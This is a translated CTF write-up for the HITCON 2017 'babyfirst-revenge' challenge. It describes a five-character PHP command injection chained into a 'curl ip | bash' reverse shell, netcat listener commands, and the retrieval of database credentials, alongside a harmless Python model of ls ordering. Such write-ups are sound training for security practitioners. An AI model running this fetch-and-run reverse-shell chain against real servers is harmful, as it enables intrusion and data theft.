HITCON2017(babyfirst-revenge) writeup

Reposted from dazhuanlan: https://www.dazhuanlan.com/2019/08/26/5d6339834b65e/


Here I mainly record the pitfalls I stepped on.

My first reaction on reading the source was to write a webshell onto the server, but a PHP trojan is certainly useless here, haha.

Reference exploit from orange: https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2017/babyfirst-revenge/exploit.py

The idea: build a bash script line by line and run it with sh; put the reverse shell command in a script on your own VPS and fetch it with curl ip | bash so that bash runs it.

The first thing I thought of was the curl command, but the PHP source only lets you submit at most 5 characters per request, and the default sort order of ls is certainly going to cause problems.

So write the script with ls -t>g: this writes the file names into the script g in reverse chronological order (ls -t|tac>g gives ascending order).

For example, with this input (screenshot omitted):

ls ends up at the bottom, which is not what we need.

Find a way to get ls to the front:

When bash runs the script it will hit lines such as _ and report an error, but it just keeps going, so this does not affect the final ls -t>g being executed by bash.

OK, here is a pitfall about the directory listing:

Some will say: when I run the ls command the sort order is not the same as yours (the figure above is from my local environment, WSL on Ubuntu [it sometimes misbehaves, sometimes not]).

It may look like this (from an Ubuntu 18 virtual machine):

That is because the file names generated by PHP and those generated from Linux commands do not sort the same way: ls sorts in dictionary order, and that order is governed by the locale collation setting, LC_COLLATE.

Run LC_COLLATE=C ls and it works happily, haha.

Then write the reverse shell on the VPS.


The Python script:

OK, the second pitfall:

When splitting your VPS IP address, a fragment like .1 with the dot in front is invalid (a name starting with a dot is hidden); a dot written at the end comes out fine, so be careful when splitting and write 1. instead.
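To make the three listing pitfalls above concrete (ls -t versus ls -t|tac, LC_COLLATE, and hidden dot-names), here is a small Python model of how ls orders a directory; this is an added example, not the exploit from the original post or from orange's repository. The file names and timestamps are constructed, and the "locale" collation is a deliberately simplified approximation of a natural-language locale (punctuation and case ignored at the first level), not glibc's exact tables.

```python
from dataclasses import dataclass


@dataclass
class Entry:
    name: str      # file name, i.e. one line of the future script
    mtime: float   # modification time; one file per request, so later fragments are newer


# Constructed sandbox contents, in creation order (mtime increasing).
SANDBOX = [
    Entry("ls", 1), Entry("_", 2), Entry("-t", 3), Entry("A1", 4),
    Entry("b2", 5), Entry("1.", 6), Entry(".1", 7),
]


def ls(entries, by_time=False, reverse=False, collate="C", show_hidden=False):
    """Model of the order in which `ls` lists a directory.

    by_time=True   -> `ls -t` (newest first); reverse=True on top of it -> `ls -t | tac`
    collate="C"    -> plain `ls` under LC_COLLATE=C: bytewise order
    collate="locale" -> simplified natural-language collation (approximation only)
    show_hidden    -> `ls -a`; without it, names starting with '.' are not listed
    """
    visible = [e for e in entries if show_hidden or not e.name.startswith(".")]
    if by_time:
        ordered = sorted(visible, key=lambda e: e.mtime, reverse=True)
    elif collate == "C":
        ordered = sorted(visible, key=lambda e: e.name.encode())
    else:
        # First level: alphanumerics only, case-folded; ties fall back to the raw name.
        ordered = sorted(
            visible,
            key=lambda e: ("".join(c for c in e.name if c.isalnum()).casefold(), e.name),
        )
    if reverse:
        ordered.reverse()
    return [e.name for e in ordered]


def build_script(entries):
    """What `ls -t | tac > g` would leave in g: the fragments in creation order."""
    return "\n".join(ls(entries, by_time=True, reverse=True)) + "\n"


if __name__ == "__main__":
    print("ls -t      :", ls(SANDBOX, by_time=True))
    print("ls (C)     :", ls(SANDBOX))
    print("ls (locale):", ls(SANDBOX, collate="locale"))
    print(build_script(SANDBOX), end="")
```

Note that the dot-name .1 never appears in the generated script unless -a is used, and that the C and locale orders disagree for the same set of names, which is exactly why the listing differed between machines.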

Then write the curl command that pulls the reverse shell.

Before running the script, have nc listen on port 8080 on your VPS:

nc -lvvp 8080

OK, the third pitfall:

Originally my VPS was CentOS 6 and the nc installed on it did not work; the version from its package source was just too broken, so I switched straight to Ubuntu.

Senior xsser said to think laterally: if nc does not work, use php -S IP:8080 or tcpdump -i eth0 "port 8080" instead; something worth learning.

There was also a problem caused by DNS; the senior nicknamed pig master said -n disables DNS resolution, but no domain name is used here, so why would DNS cause problems? I still have not figured it out...

nc -lvvnp 8080 works.

You can also use:

ncat -lvvp 8080, no problems found.

Then, get the reverse webshell.

Found the database password and a hint in the /home directory:

Connected to the database:

OK, the fourth pitfall:

After typing the mysql password there was no response, and for a while I thought it was stuck; it turned out you just keep writing the mysql statements, finish with an exit command, and the output is echoed back.

Get the flag.


Source: www.cnblogs.com/petewell/p/11411120.html